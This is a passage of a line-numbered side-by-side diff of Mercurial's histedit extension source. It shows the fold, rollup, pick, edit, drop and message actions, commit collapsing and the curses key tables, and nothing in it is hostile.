604 % node.short(self.node)
606 )
605 )
607 return ctx, [(self.node, tuple())]
606 return ctx, [(self.node, tuple())]
608 if ctx.node() == self.node:
607 if ctx.node() == self.node:
609 # Nothing changed
608 # Nothing changed
610 return ctx, []
609 return ctx, []
611 return ctx, [(self.node, (ctx.node(),))]
610 return ctx, [(self.node, (ctx.node(),))]
612
611
613
612
614 def commitfuncfor(repo, src):
613 def commitfuncfor(repo, src):
615 """Build a commit function for the replacement of <src>
614 """Build a commit function for the replacement of <src>
616
615
617 This function ensure we apply the same treatment to all changesets.
616 This function ensure we apply the same treatment to all changesets.
618
617
619 - Add a 'histedit_source' entry in extra.
618 - Add a 'histedit_source' entry in extra.
620
619
621 Note that fold has its own separated logic because its handling is a bit
620 Note that fold has its own separated logic because its handling is a bit
622 different and not easily factored out of the fold method.
621 different and not easily factored out of the fold method.
623 """
622 """
624 phasemin = src.phase()
623 phasemin = src.phase()
625
624
626 def commitfunc(**kwargs):
625 def commitfunc(**kwargs):
627 overrides = {(b'phases', b'new-commit'): phasemin}
626 overrides = {(b'phases', b'new-commit'): phasemin}
628 with repo.ui.configoverride(overrides, b'histedit'):
627 with repo.ui.configoverride(overrides, b'histedit'):
629 extra = kwargs.get('extra', {}).copy()
628 extra = kwargs.get('extra', {}).copy()
630 extra[b'histedit_source'] = src.hex()
629 extra[b'histedit_source'] = src.hex()
631 kwargs['extra'] = extra
630 kwargs['extra'] = extra
632 return repo.commit(**kwargs)
631 return repo.commit(**kwargs)
633
632
634 return commitfunc
633 return commitfunc
635
634
636
635
637 def applychanges(ui, repo, ctx, opts):
636 def applychanges(ui, repo, ctx, opts):
638 """Merge changeset from ctx (only) in the current working directory"""
637 """Merge changeset from ctx (only) in the current working directory"""
639 wcpar = repo.dirstate.p1()
638 wcpar = repo.dirstate.p1()
640 if ctx.p1().node() == wcpar:
639 if ctx.p1().node() == wcpar:
641 # edits are "in place" we do not need to make any merge,
640 # edits are "in place" we do not need to make any merge,
642 # just applies changes on parent for editing
641 # just applies changes on parent for editing
643 ui.pushbuffer()
642 ui.pushbuffer()
644 cmdutil.revert(ui, repo, ctx, (wcpar, node.nullid), all=True)
643 cmdutil.revert(ui, repo, ctx, (wcpar, node.nullid), all=True)
645 stats = mergemod.updateresult(0, 0, 0, 0)
644 stats = mergemod.updateresult(0, 0, 0, 0)
646 ui.popbuffer()
645 ui.popbuffer()
647 else:
646 else:
648 try:
647 try:
649 # ui.forcemerge is an internal variable, do not document
648 # ui.forcemerge is an internal variable, do not document
650 repo.ui.setconfig(
649 repo.ui.setconfig(
651 b'ui', b'forcemerge', opts.get(b'tool', b''), b'histedit'
650 b'ui', b'forcemerge', opts.get(b'tool', b''), b'histedit'
652 )
651 )
653 stats = mergemod.graft(repo, ctx, labels=[b'local', b'histedit'])
652 stats = mergemod.graft(repo, ctx, labels=[b'local', b'histedit'])
654 finally:
653 finally:
655 repo.ui.setconfig(b'ui', b'forcemerge', b'', b'histedit')
654 repo.ui.setconfig(b'ui', b'forcemerge', b'', b'histedit')
656 return stats
655 return stats
657
656
658
657
659 def collapse(repo, firstctx, lastctx, commitopts, skipprompt=False):
658 def collapse(repo, firstctx, lastctx, commitopts, skipprompt=False):
660 """collapse the set of revisions from first to last as new one.
659 """collapse the set of revisions from first to last as new one.
661
660
662 Expected commit options are:
661 Expected commit options are:
663 - message
662 - message
664 - date
663 - date
665 - username
664 - username
666 Commit message is edited in all cases.
665 Commit message is edited in all cases.
667
666
668 This function works in memory."""
667 This function works in memory."""
669 ctxs = list(repo.set(b'%d::%d', firstctx.rev(), lastctx.rev()))
668 ctxs = list(repo.set(b'%d::%d', firstctx.rev(), lastctx.rev()))
670 if not ctxs:
669 if not ctxs:
671 return None
670 return None
672 for c in ctxs:
671 for c in ctxs:
673 if not c.mutable():
672 if not c.mutable():
674 raise error.ParseError(
673 raise error.ParseError(
675 _(b"cannot fold into public change %s") % node.short(c.node())
674 _(b"cannot fold into public change %s") % node.short(c.node())
676 )
675 )
677 base = firstctx.p1()
676 base = firstctx.p1()
678
677
679 # commit a new version of the old changeset, including the update
678 # commit a new version of the old changeset, including the update
680 # collect all files which might be affected
679 # collect all files which might be affected
681 files = set()
680 files = set()
682 for ctx in ctxs:
681 for ctx in ctxs:
683 files.update(ctx.files())
682 files.update(ctx.files())
684
683
685 # Recompute copies (avoid recording a -> b -> a)
684 # Recompute copies (avoid recording a -> b -> a)
686 copied = copies.pathcopies(base, lastctx)
685 copied = copies.pathcopies(base, lastctx)
687
686
688 # prune files which were reverted by the updates
687 # prune files which were reverted by the updates
689 files = [f for f in files if not cmdutil.samefile(f, lastctx, base)]
688 files = [f for f in files if not cmdutil.samefile(f, lastctx, base)]
690 # commit version of these files as defined by head
689 # commit version of these files as defined by head
691 headmf = lastctx.manifest()
690 headmf = lastctx.manifest()
692
691
693 def filectxfn(repo, ctx, path):
692 def filectxfn(repo, ctx, path):
694 if path in headmf:
693 if path in headmf:
695 fctx = lastctx[path]
694 fctx = lastctx[path]
696 flags = fctx.flags()
695 flags = fctx.flags()
697 mctx = context.memfilectx(
696 mctx = context.memfilectx(
698 repo,
697 repo,
699 ctx,
698 ctx,
700 fctx.path(),
699 fctx.path(),
701 fctx.data(),
700 fctx.data(),
702 islink=b'l' in flags,
701 islink=b'l' in flags,
703 isexec=b'x' in flags,
702 isexec=b'x' in flags,
704 copysource=copied.get(path),
703 copysource=copied.get(path),
705 )
704 )
706 return mctx
705 return mctx
707 return None
706 return None
708
707
709 if commitopts.get(b'message'):
708 if commitopts.get(b'message'):
710 message = commitopts[b'message']
709 message = commitopts[b'message']
711 else:
710 else:
712 message = firstctx.description()
711 message = firstctx.description()
713 user = commitopts.get(b'user')
712 user = commitopts.get(b'user')
714 date = commitopts.get(b'date')
713 date = commitopts.get(b'date')
715 extra = commitopts.get(b'extra')
714 extra = commitopts.get(b'extra')
716
715
717 parents = (firstctx.p1().node(), firstctx.p2().node())
716 parents = (firstctx.p1().node(), firstctx.p2().node())
718 editor = None
717 editor = None
719 if not skipprompt:
718 if not skipprompt:
720 editor = cmdutil.getcommiteditor(edit=True, editform=b'histedit.fold')
719 editor = cmdutil.getcommiteditor(edit=True, editform=b'histedit.fold')
721 new = context.memctx(
720 new = context.memctx(
722 repo,
721 repo,
723 parents=parents,
722 parents=parents,
724 text=message,
723 text=message,
725 files=files,
724 files=files,
726 filectxfn=filectxfn,
725 filectxfn=filectxfn,
727 user=user,
726 user=user,
728 date=date,
727 date=date,
729 extra=extra,
728 extra=extra,
730 editor=editor,
729 editor=editor,
731 )
730 )
732 return repo.commitctx(new)
731 return repo.commitctx(new)
733
732
734
733
735 def _isdirtywc(repo):
734 def _isdirtywc(repo):
736 return repo[None].dirty(missing=True)
735 return repo[None].dirty(missing=True)
737
736
738
737
739 def abortdirty():
738 def abortdirty():
740 raise error.Abort(
739 raise error.Abort(
741 _(b'working copy has pending changes'),
740 _(b'working copy has pending changes'),
742 hint=_(
741 hint=_(
743 b'amend, commit, or revert them and run histedit '
742 b'amend, commit, or revert them and run histedit '
744 b'--continue, or abort with histedit --abort'
743 b'--continue, or abort with histedit --abort'
745 ),
744 ),
746 )
745 )
747
746
748
747
749 def action(verbs, message, priority=False, internal=False):
748 def action(verbs, message, priority=False, internal=False):
750 def wrap(cls):
749 def wrap(cls):
751 assert not priority or not internal
750 assert not priority or not internal
752 verb = verbs[0]
751 verb = verbs[0]
753 if priority:
752 if priority:
754 primaryactions.add(verb)
753 primaryactions.add(verb)
755 elif internal:
754 elif internal:
756 internalactions.add(verb)
755 internalactions.add(verb)
757 elif len(verbs) > 1:
756 elif len(verbs) > 1:
758 secondaryactions.add(verb)
757 secondaryactions.add(verb)
759 else:
758 else:
760 tertiaryactions.add(verb)
759 tertiaryactions.add(verb)
761
760
762 cls.verb = verb
761 cls.verb = verb
763 cls.verbs = verbs
762 cls.verbs = verbs
764 cls.message = message
763 cls.message = message
765 for verb in verbs:
764 for verb in verbs:
766 actiontable[verb] = cls
765 actiontable[verb] = cls
767 return cls
766 return cls
768
767
769 return wrap
768 return wrap
770
769
771
770
772 @action([b'pick', b'p'], _(b'use commit'), priority=True)
771 @action([b'pick', b'p'], _(b'use commit'), priority=True)
773 class pick(histeditaction):
772 class pick(histeditaction):
774 def run(self):
773 def run(self):
775 rulectx = self.repo[self.node]
774 rulectx = self.repo[self.node]
776 if rulectx.p1().node() == self.state.parentctxnode:
775 if rulectx.p1().node() == self.state.parentctxnode:
777 self.repo.ui.debug(b'node %s unchanged\n' % node.short(self.node))
776 self.repo.ui.debug(b'node %s unchanged\n' % node.short(self.node))
778 return rulectx, []
777 return rulectx, []
779
778
780 return super(pick, self).run()
779 return super(pick, self).run()
781
780
782
781
783 @action([b'edit', b'e'], _(b'use commit, but stop for amending'), priority=True)
782 @action([b'edit', b'e'], _(b'use commit, but stop for amending'), priority=True)
784 class edit(histeditaction):
783 class edit(histeditaction):
785 def run(self):
784 def run(self):
786 repo = self.repo
785 repo = self.repo
787 rulectx = repo[self.node]
786 rulectx = repo[self.node]
788 hg.update(repo, self.state.parentctxnode, quietempty=True)
787 hg.update(repo, self.state.parentctxnode, quietempty=True)
789 applychanges(repo.ui, repo, rulectx, {})
788 applychanges(repo.ui, repo, rulectx, {})
790 raise error.InterventionRequired(
789 raise error.InterventionRequired(
791 _(b'Editing (%s), you may commit or record as needed now.')
790 _(b'Editing (%s), you may commit or record as needed now.')
792 % node.short(self.node),
791 % node.short(self.node),
793 hint=_(b'hg histedit --continue to resume'),
792 hint=_(b'hg histedit --continue to resume'),
794 )
793 )
795
794
796 def commiteditor(self):
795 def commiteditor(self):
797 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.edit')
796 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.edit')
798
797
799
798
800 @action([b'fold', b'f'], _(b'use commit, but combine it with the one above'))
799 @action([b'fold', b'f'], _(b'use commit, but combine it with the one above'))
801 class fold(histeditaction):
800 class fold(histeditaction):
802 def verify(self, prev, expected, seen):
801 def verify(self, prev, expected, seen):
803 """ Verifies semantic correctness of the fold rule"""
802 """ Verifies semantic correctness of the fold rule"""
804 super(fold, self).verify(prev, expected, seen)
803 super(fold, self).verify(prev, expected, seen)
805 repo = self.repo
804 repo = self.repo
806 if not prev:
805 if not prev:
807 c = repo[self.node].p1()
806 c = repo[self.node].p1()
808 elif not prev.verb in (b'pick', b'base'):
807 elif not prev.verb in (b'pick', b'base'):
809 return
808 return
810 else:
809 else:
811 c = repo[prev.node]
810 c = repo[prev.node]
812 if not c.mutable():
811 if not c.mutable():
813 raise error.ParseError(
812 raise error.ParseError(
814 _(b"cannot fold into public change %s") % node.short(c.node())
813 _(b"cannot fold into public change %s") % node.short(c.node())
815 )
814 )
816
815
817 def continuedirty(self):
816 def continuedirty(self):
818 repo = self.repo
817 repo = self.repo
819 rulectx = repo[self.node]
818 rulectx = repo[self.node]
820
819
821 commit = commitfuncfor(repo, rulectx)
820 commit = commitfuncfor(repo, rulectx)
822 commit(
821 commit(
823 text=b'fold-temp-revision %s' % node.short(self.node),
822 text=b'fold-temp-revision %s' % node.short(self.node),
824 user=rulectx.user(),
823 user=rulectx.user(),
825 date=rulectx.date(),
824 date=rulectx.date(),
826 extra=rulectx.extra(),
825 extra=rulectx.extra(),
827 )
826 )
828
827
829 def continueclean(self):
828 def continueclean(self):
830 repo = self.repo
829 repo = self.repo
831 ctx = repo[b'.']
830 ctx = repo[b'.']
832 rulectx = repo[self.node]
831 rulectx = repo[self.node]
833 parentctxnode = self.state.parentctxnode
832 parentctxnode = self.state.parentctxnode
834 if ctx.node() == parentctxnode:
833 if ctx.node() == parentctxnode:
835 repo.ui.warn(_(b'%s: empty changeset\n') % node.short(self.node))
834 repo.ui.warn(_(b'%s: empty changeset\n') % node.short(self.node))
836 return ctx, [(self.node, (parentctxnode,))]
835 return ctx, [(self.node, (parentctxnode,))]
837
836
838 parentctx = repo[parentctxnode]
837 parentctx = repo[parentctxnode]
839 newcommits = {
838 newcommits = {
840 c.node()
839 c.node()
841 for c in repo.set(b'(%d::. - %d)', parentctx.rev(), parentctx.rev())
840 for c in repo.set(b'(%d::. - %d)', parentctx.rev(), parentctx.rev())
842 }
841 }
843 if not newcommits:
842 if not newcommits:
844 repo.ui.warn(
843 repo.ui.warn(
845 _(
844 _(
846 b'%s: cannot fold - working copy is not a '
845 b'%s: cannot fold - working copy is not a '
847 b'descendant of previous commit %s\n'
846 b'descendant of previous commit %s\n'
848 )
847 )
849 % (node.short(self.node), node.short(parentctxnode))
848 % (node.short(self.node), node.short(parentctxnode))
850 )
849 )
851 return ctx, [(self.node, (ctx.node(),))]
850 return ctx, [(self.node, (ctx.node(),))]
852
851
853 middlecommits = newcommits.copy()
852 middlecommits = newcommits.copy()
854 middlecommits.discard(ctx.node())
853 middlecommits.discard(ctx.node())
855
854
856 return self.finishfold(
855 return self.finishfold(
857 repo.ui, repo, parentctx, rulectx, ctx.node(), middlecommits
856 repo.ui, repo, parentctx, rulectx, ctx.node(), middlecommits
858 )
857 )
859
858
860 def skipprompt(self):
859 def skipprompt(self):
861 """Returns true if the rule should skip the message editor.
860 """Returns true if the rule should skip the message editor.
862
861
863 For example, 'fold' wants to show an editor, but 'rollup'
862 For example, 'fold' wants to show an editor, but 'rollup'
864 doesn't want to.
863 doesn't want to.
865 """
864 """
866 return False
865 return False
867
866
868 def mergedescs(self):
867 def mergedescs(self):
869 """Returns true if the rule should merge messages of multiple changes.
868 """Returns true if the rule should merge messages of multiple changes.
870
869
871 This exists mainly so that 'rollup' rules can be a subclass of
870 This exists mainly so that 'rollup' rules can be a subclass of
872 'fold'.
871 'fold'.
873 """
872 """
874 return True
873 return True
875
874
876 def firstdate(self):
875 def firstdate(self):
877 """Returns true if the rule should preserve the date of the first
876 """Returns true if the rule should preserve the date of the first
878 change.
877 change.
879
878
880 This exists mainly so that 'rollup' rules can be a subclass of
879 This exists mainly so that 'rollup' rules can be a subclass of
881 'fold'.
880 'fold'.
882 """
881 """
883 return False
882 return False
884
883
885 def finishfold(self, ui, repo, ctx, oldctx, newnode, internalchanges):
884 def finishfold(self, ui, repo, ctx, oldctx, newnode, internalchanges):
886 parent = ctx.p1().node()
885 parent = ctx.p1().node()
887 hg.updaterepo(repo, parent, overwrite=False)
886 hg.updaterepo(repo, parent, overwrite=False)
888 ### prepare new commit data
887 ### prepare new commit data
889 commitopts = {}
888 commitopts = {}
890 commitopts[b'user'] = ctx.user()
889 commitopts[b'user'] = ctx.user()
891 # commit message
890 # commit message
892 if not self.mergedescs():
891 if not self.mergedescs():
893 newmessage = ctx.description()
892 newmessage = ctx.description()
894 else:
893 else:
895 newmessage = (
894 newmessage = (
896 b'\n***\n'.join(
895 b'\n***\n'.join(
897 [ctx.description()]
896 [ctx.description()]
898 + [repo[r].description() for r in internalchanges]
897 + [repo[r].description() for r in internalchanges]
899 + [oldctx.description()]
898 + [oldctx.description()]
900 )
899 )
901 + b'\n'
900 + b'\n'
902 )
901 )
903 commitopts[b'message'] = newmessage
902 commitopts[b'message'] = newmessage
904 # date
903 # date
905 if self.firstdate():
904 if self.firstdate():
906 commitopts[b'date'] = ctx.date()
905 commitopts[b'date'] = ctx.date()
907 else:
906 else:
908 commitopts[b'date'] = max(ctx.date(), oldctx.date())
907 commitopts[b'date'] = max(ctx.date(), oldctx.date())
909 # if date is to be updated to current
908 # if date is to be updated to current
910 if ui.configbool(b'rewrite', b'update-timestamp'):
909 if ui.configbool(b'rewrite', b'update-timestamp'):
911 commitopts[b'date'] = dateutil.makedate()
910 commitopts[b'date'] = dateutil.makedate()
912
911
913 extra = ctx.extra().copy()
912 extra = ctx.extra().copy()
914 # histedit_source
913 # histedit_source
915 # note: ctx is likely a temporary commit but that the best we can do
914 # note: ctx is likely a temporary commit but that the best we can do
916 # here. This is sufficient to solve issue3681 anyway.
915 # here. This is sufficient to solve issue3681 anyway.
917 extra[b'histedit_source'] = b'%s,%s' % (ctx.hex(), oldctx.hex())
916 extra[b'histedit_source'] = b'%s,%s' % (ctx.hex(), oldctx.hex())
918 commitopts[b'extra'] = extra
917 commitopts[b'extra'] = extra
919 phasemin = max(ctx.phase(), oldctx.phase())
918 phasemin = max(ctx.phase(), oldctx.phase())
920 overrides = {(b'phases', b'new-commit'): phasemin}
919 overrides = {(b'phases', b'new-commit'): phasemin}
921 with repo.ui.configoverride(overrides, b'histedit'):
920 with repo.ui.configoverride(overrides, b'histedit'):
922 n = collapse(
921 n = collapse(
923 repo,
922 repo,
924 ctx,
923 ctx,
925 repo[newnode],
924 repo[newnode],
926 commitopts,
925 commitopts,
927 skipprompt=self.skipprompt(),
926 skipprompt=self.skipprompt(),
928 )
927 )
929 if n is None:
928 if n is None:
930 return ctx, []
929 return ctx, []
931 hg.updaterepo(repo, n, overwrite=False)
930 hg.updaterepo(repo, n, overwrite=False)
932 replacements = [
931 replacements = [
933 (oldctx.node(), (newnode,)),
932 (oldctx.node(), (newnode,)),
934 (ctx.node(), (n,)),
933 (ctx.node(), (n,)),
935 (newnode, (n,)),
934 (newnode, (n,)),
936 ]
935 ]
937 for ich in internalchanges:
936 for ich in internalchanges:
938 replacements.append((ich, (n,)))
937 replacements.append((ich, (n,)))
939 return repo[n], replacements
938 return repo[n], replacements
940
939
941
940
942 @action(
941 @action(
943 [b'base', b'b'],
942 [b'base', b'b'],
944 _(b'checkout changeset and apply further changesets from there'),
943 _(b'checkout changeset and apply further changesets from there'),
945 )
944 )
946 class base(histeditaction):
945 class base(histeditaction):
947 def run(self):
946 def run(self):
948 if self.repo[b'.'].node() != self.node:
947 if self.repo[b'.'].node() != self.node:
949 mergemod.clean_update(self.repo[self.node])
948 mergemod.clean_update(self.repo[self.node])
950 return self.continueclean()
949 return self.continueclean()
951
950
952 def continuedirty(self):
951 def continuedirty(self):
953 abortdirty()
952 abortdirty()
954
953
955 def continueclean(self):
954 def continueclean(self):
956 basectx = self.repo[b'.']
955 basectx = self.repo[b'.']
957 return basectx, []
956 return basectx, []
958
957
959 def _verifynodeconstraints(self, prev, expected, seen):
958 def _verifynodeconstraints(self, prev, expected, seen):
960 # base can only be use with a node not in the edited set
959 # base can only be use with a node not in the edited set
961 if self.node in expected:
960 if self.node in expected:
962 msg = _(b'%s "%s" changeset was an edited list candidate')
961 msg = _(b'%s "%s" changeset was an edited list candidate')
963 raise error.ParseError(
962 raise error.ParseError(
964 msg % (self.verb, node.short(self.node)),
963 msg % (self.verb, node.short(self.node)),
965 hint=_(b'base must only use unlisted changesets'),
964 hint=_(b'base must only use unlisted changesets'),
966 )
965 )
967
966
968
967
969 @action(
968 @action(
970 [b'_multifold'],
969 [b'_multifold'],
971 _(
970 _(
972 """fold subclass used for when multiple folds happen in a row
971 """fold subclass used for when multiple folds happen in a row
973
972
974 We only want to fire the editor for the folded message once when
973 We only want to fire the editor for the folded message once when
975 (say) four changes are folded down into a single change. This is
974 (say) four changes are folded down into a single change. This is
976 similar to rollup, but we should preserve both messages so that
975 similar to rollup, but we should preserve both messages so that
977 when the last fold operation runs we can show the user all the
976 when the last fold operation runs we can show the user all the
978 commit messages in their editor.
977 commit messages in their editor.
979 """
978 """
980 ),
979 ),
981 internal=True,
980 internal=True,
982 )
981 )
983 class _multifold(fold):
982 class _multifold(fold):
984 def skipprompt(self):
983 def skipprompt(self):
985 return True
984 return True
986
985
987
986
988 @action(
987 @action(
989 [b"roll", b"r"],
988 [b"roll", b"r"],
990 _(b"like fold, but discard this commit's description and date"),
989 _(b"like fold, but discard this commit's description and date"),
991 )
990 )
992 class rollup(fold):
991 class rollup(fold):
993 def mergedescs(self):
992 def mergedescs(self):
994 return False
993 return False
995
994
996 def skipprompt(self):
995 def skipprompt(self):
997 return True
996 return True
998
997
999 def firstdate(self):
998 def firstdate(self):
1000 return True
999 return True
1001
1000
1002
1001
1003 @action([b"drop", b"d"], _(b'remove commit from history'))
1002 @action([b"drop", b"d"], _(b'remove commit from history'))
1004 class drop(histeditaction):
1003 class drop(histeditaction):
1005 def run(self):
1004 def run(self):
1006 parentctx = self.repo[self.state.parentctxnode]
1005 parentctx = self.repo[self.state.parentctxnode]
1007 return parentctx, [(self.node, tuple())]
1006 return parentctx, [(self.node, tuple())]
1008
1007
1009
1008
1010 @action(
1009 @action(
1011 [b"mess", b"m"],
1010 [b"mess", b"m"],
1012 _(b'edit commit message without changing commit content'),
1011 _(b'edit commit message without changing commit content'),
1013 priority=True,
1012 priority=True,
1014 )
1013 )
1015 class message(histeditaction):
1014 class message(histeditaction):
1016 def commiteditor(self):
1015 def commiteditor(self):
1017 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.mess')
1016 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.mess')
1018
1017
1019
1018
1020 def findoutgoing(ui, repo, remote=None, force=False, opts=None):
1019 def findoutgoing(ui, repo, remote=None, force=False, opts=None):
1021 """utility function to find the first outgoing changeset
1020 """utility function to find the first outgoing changeset
1022
1021
1023 Used by initialization code"""
1022 Used by initialization code"""
1024 if opts is None:
1023 if opts is None:
1025 opts = {}
1024 opts = {}
1026 dest = ui.expandpath(remote or b'default-push', remote or b'default')
1025 dest = ui.expandpath(remote or b'default-push', remote or b'default')
1027 dest, branches = hg.parseurl(dest, None)[:2]
1026 dest, branches = hg.parseurl(dest, None)[:2]
1028 ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
1027 ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
1029
1028
1030 revs, checkout = hg.addbranchrevs(repo, repo, branches, None)
1029 revs, checkout = hg.addbranchrevs(repo, repo, branches, None)
1031 other = hg.peer(repo, opts, dest)
1030 other = hg.peer(repo, opts, dest)
1032
1031
1033 if revs:
1032 if revs:
1034 revs = [repo.lookup(rev) for rev in revs]
1033 revs = [repo.lookup(rev) for rev in revs]
1035
1034
1036 outgoing = discovery.findcommonoutgoing(repo, other, revs, force=force)
1035 outgoing = discovery.findcommonoutgoing(repo, other, revs, force=force)
1037 if not outgoing.missing:
1036 if not outgoing.missing:
1038 raise error.Abort(_(b'no outgoing ancestors'))
1037 raise error.Abort(_(b'no outgoing ancestors'))
1039 roots = list(repo.revs(b"roots(%ln)", outgoing.missing))
1038 roots = list(repo.revs(b"roots(%ln)", outgoing.missing))
1040 if len(roots) > 1:
1039 if len(roots) > 1:
1041 msg = _(b'there are ambiguous outgoing revisions')
1040 msg = _(b'there are ambiguous outgoing revisions')
1042 hint = _(b"see 'hg help histedit' for more detail")
1041 hint = _(b"see 'hg help histedit' for more detail")
1043 raise error.Abort(msg, hint=hint)
1042 raise error.Abort(msg, hint=hint)
1044 return repo[roots[0]].node()
1043 return repo[roots[0]].node()
1045
1044
1046
1045
1047 # Curses Support
1046 # Curses Support
1048 try:
1047 try:
1049 import curses
1048 import curses
1050 except ImportError:
1049 except ImportError:
1051 curses = None
1050 curses = None
1052
1051
1053 KEY_LIST = [b'pick', b'edit', b'fold', b'drop', b'mess', b'roll']
1052 KEY_LIST = [b'pick', b'edit', b'fold', b'drop', b'mess', b'roll']
1054 ACTION_LABELS = {
1053 ACTION_LABELS = {
1055 b'fold': b'^fold',
1054 b'fold': b'^fold',
1056 b'roll': b'^roll',
1055 b'roll': b'^roll',
1057 }
1056 }
1058
1057
1059 COLOR_HELP, COLOR_SELECTED, COLOR_OK, COLOR_WARN, COLOR_CURRENT = 1, 2, 3, 4, 5
1058 COLOR_HELP, COLOR_SELECTED, COLOR_OK, COLOR_WARN, COLOR_CURRENT = 1, 2, 3, 4, 5
1060 COLOR_DIFF_ADD_LINE, COLOR_DIFF_DEL_LINE, COLOR_DIFF_OFFSET = 6, 7, 8
1059 COLOR_DIFF_ADD_LINE, COLOR_DIFF_DEL_LINE, COLOR_DIFF_OFFSET = 6, 7, 8
1061 COLOR_ROLL, COLOR_ROLL_CURRENT, COLOR_ROLL_SELECTED = 9, 10, 11
1060 COLOR_ROLL, COLOR_ROLL_CURRENT, COLOR_ROLL_SELECTED = 9, 10, 11
1062
1061
1063 E_QUIT, E_HISTEDIT = 1, 2
1062 E_QUIT, E_HISTEDIT = 1, 2
1064 E_PAGEDOWN, E_PAGEUP, E_LINEUP, E_LINEDOWN, E_RESIZE = 3, 4, 5, 6, 7
1063 E_PAGEDOWN, E_PAGEUP, E_LINEUP, E_LINEDOWN, E_RESIZE = 3, 4, 5, 6, 7
1065 MODE_INIT, MODE_PATCH, MODE_RULES, MODE_HELP = 0, 1, 2, 3
1064 MODE_INIT, MODE_PATCH, MODE_RULES, MODE_HELP = 0, 1, 2, 3
1066
1065
1067 KEYTABLE = {
1066 KEYTABLE = {
1068 b'global': {
1067 b'global': {
1069 b'h': b'next-action',
1068 b'h': b'next-action',
1070 b'KEY_RIGHT': b'next-action',
1069 b'KEY_RIGHT': b'next-action',
1071 b'l': b'prev-action',
1070 b'l': b'prev-action',
1072 b'KEY_LEFT': b'prev-action',
1071 b'KEY_LEFT': b'prev-action',
1073 b'q': b'quit',
1072 b'q': b'quit',
1074 b'c': b'histedit',
1073 b'c': b'histedit',
1075 b'C': b'histedit',
1074 b'C': b'histedit',
1076 b'v': b'showpatch',
1075 b'v': b'showpatch',
1077 b'?': b'help',
1076 b'?': b'help',
1078 },
1077 },
1079 MODE_RULES: {
1078 MODE_RULES: {
1080 b'd': b'action-drop',
1079 b'd': b'action-drop',
1081 b'e': b'action-edit',
1080 b'e': b'action-edit',
1082 b'f': b'action-fold',
1081 b'f': b'action-fold',
1083 b'm': b'action-mess',
1082 b'm': b'action-mess',
1084 b'p': b'action-pick',
1083 b'p': b'action-pick',
1085 b'r': b'action-roll',
1084 b'r': b'action-roll',
1086 b' ': b'select',
1085 b' ': b'select',
1087 b'j': b'down',
1086 b'j': b'down',
1088 b'k': b'up',
1087 b'k': b'up',
1089 b'KEY_DOWN': b'down',
1088 b'KEY_DOWN': b'down',
1090 b'KEY_UP': b'up',
1089 b'KEY_UP': b'up',
1091 b'J': b'move-down',
1090 b'J': b'move-down',
1092 b'K': b'move-up',
1091 b'K': b'move-up',
1093 b'KEY_NPAGE': b'move-down',
1092 b'KEY_NPAGE': b'move-down',
1094 b'KEY_PPAGE': b'move-up',
1093 b'KEY_PPAGE': b'move-up',
1095 b'0': b'goto', # Used for 0..9
1094 b'0': b'goto', # Used for 0..9
1096 },
1095 },
1097 MODE_PATCH: {
1096 MODE_PATCH: {
1098 b' ': b'page-down',
1097 b' ': b'page-down',
1099 b'KEY_NPAGE': b'page-down',
1098 b'KEY_NPAGE': b'page-down',
1100 b'KEY_PPAGE': b'page-up',
1099 b'KEY_PPAGE': b'page-up',
1101 b'j': b'line-down',
1100 b'j': b'line-down',
1102 b'k': b'line-up',
1101 b'k': b'line-up',
1103 b'KEY_DOWN': b'line-down',
1102 b'KEY_DOWN': b'line-down',
1104 b'KEY_UP': b'line-up',
1103 b'KEY_UP': b'line-up',
1105 b'J': b'down',
1104 b'J': b'down',
1106 b'K': b'up',
1105 b'K': b'up',
1107 },
1106 },
1108 MODE_HELP: {},
1107 MODE_HELP: {},
1109 }
1108 }
1110
1109
1111
1110
1112 def screen_size():
1111 def screen_size():
1113 return struct.unpack(b'hh', fcntl.ioctl(1, termios.TIOCGWINSZ, b' '))
1112 return struct.unpack(b'hh', fcntl.ioctl(1, termios.TIOCGWINSZ, b' '))
1114
1113
1115
1114
1116 class histeditrule(object):
1115 class histeditrule(object):
1117 def __init__(self, ui, ctx, pos, action=b'pick'):
1116 def __init__(self, ui, ctx, pos, action=b'pick'):
1118 self.ui = ui
1117 self.ui = ui
1119 self.ctx = ctx
1118 self.ctx = ctx
1120 self.action = action
1119 self.action = action
1121 self.origpos = pos
1120 self.origpos = pos
1122 self.pos = pos
1121 self.pos = pos
1123 self.conflicts = []
1122 self.conflicts = []
1124
1123
1125 def __bytes__(self):
1124 def __bytes__(self):
1126 # Example display of several histeditrules:
1125 # Example display of several histeditrules:
1127 #
1126 #
1128 # #10 pick 316392:06a16c25c053 add option to skip tests
1127 # #10 pick 316392:06a16c25c053 add option to skip tests
1129 # #11 ^roll 316393:71313c964cc5 <RED>oops a fixup commit</RED>
1128 # #11 ^roll 316393:71313c964cc5 <RED>oops a fixup commit</RED>
1130 # #12 pick 316394:ab31f3973b0d include mfbt for mozilla-config.h
1129 # #12 pick 316394:ab31f3973b0d include mfbt for mozilla-config.h
1131 # #13 ^fold 316395:14ce5803f4c3 fix warnings
1130 # #13 ^fold 316395:14ce5803f4c3 fix warnings
1132 #
1131 #
1133 # The carets point to the changeset being folded into ("roll this
1132 # The carets point to the changeset being folded into ("roll this
1134 # changeset into the changeset above").
1133 # changeset into the changeset above").
1135 return b'%s%s' % (self.prefix, self.desc)
1134 return b'%s%s' % (self.prefix, self.desc)
1136
1135
1137 __str__ = encoding.strmethod(__bytes__)
1136 __str__ = encoding.strmethod(__bytes__)
1138
1137
1139 @property
1138 @property
1140 def prefix(self):
1139 def prefix(self):
1141 # Some actions ('fold' and 'roll') combine a patch with a
1140 # Some actions ('fold' and 'roll') combine a patch with a
1142 # previous one. Add a marker showing which patch they apply
1141 # previous one. Add a marker showing which patch they apply
1143 # to.
1142 # to.
1144 action = ACTION_LABELS.get(self.action, self.action)
1143 action = ACTION_LABELS.get(self.action, self.action)
1145
1144
1146 h = self.ctx.hex()[0:12]
1145 h = self.ctx.hex()[0:12]
1147 r = self.ctx.rev()
1146 r = self.ctx.rev()
1148
1147
1149 return b"#%s %s %d:%s " % (
1148 return b"#%s %s %d:%s " % (
1150 (b'%d' % self.origpos).ljust(2),
1149 (b'%d' % self.origpos).ljust(2),
1151 action.ljust(6),
1150 action.ljust(6),
1152 r,
1151 r,
1153 h,
1152 h,
1154 )
1153 )
1155
1154
1156 @property
1155 @property
1157 def desc(self):
